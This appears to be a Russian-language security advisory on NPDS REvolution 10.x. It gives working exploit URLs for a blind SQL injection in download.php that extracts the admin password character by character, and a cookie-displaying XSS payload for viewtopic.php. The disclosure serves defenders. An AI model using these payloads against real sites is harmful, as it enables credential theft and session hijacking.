Программа: NPDS REvolution 10.x
Уязвимость позволяет удаленному пользователю осуществить XSS нападение и
выполнить произвольные SQL команды в базе данных приложения.
1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "sortby" сценарием download.php. Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.
Эксплоит:
http://host/download.php?dcategory=All&sortby=%28select%20did%20from%20authors+where+aid=char%2897,100,109,105,
110%29+and+substr%28pwd,1,1%29=char%2848%29%29+DESC--
http://host/download.php?dcategory=All&sortby=%28select%20did%20from%20authors+where+aid=char%2897,100,109,105,
110%29+and+substr%28pwd,1,1%29=char%2849%29%29+DESC--
http://host/download.php?dcategory=All&sortby=%28select%20did%20from%20authors+where+aid=char%2897,100,109,105,
110%29+and+substr%28pwd,1,1%29=char%2884%29%29+DESC--
http://host/download.php?dcategory=All&sortby=%28select%20did%20from%20authors+where+aid=char%2897,100,109,105,
110%29+and+substr%28pwd,2,1%29=char%2848%29%29+DESC--
http://host/download.php?dcategory=All&sortby=%28select%20did%20from%20authors+where+aid=char%2897,100,109,105,
110%29+and+substr%28pwd,2,1%29=char%28101%29%29+DESC--
http://host/download.php?dcategory=All&sortby=%28select%20did%20from%20authors+where+aid=char%2897,100,109,105,
110%29+and+substr%28pwd,3,1%29=char%2852%29%29+DESC--
2) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "topic" сценарием viewtopic.php. Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого
сайта.
Эксплоит:
http://[host]/forum.php?[code]
http://[host]/viewtopic.php?[code]
http://[host]/map.php?[code]
http://host/viewtopic.php?topic=3"><script>alert(document.cookie)</script>&forum=1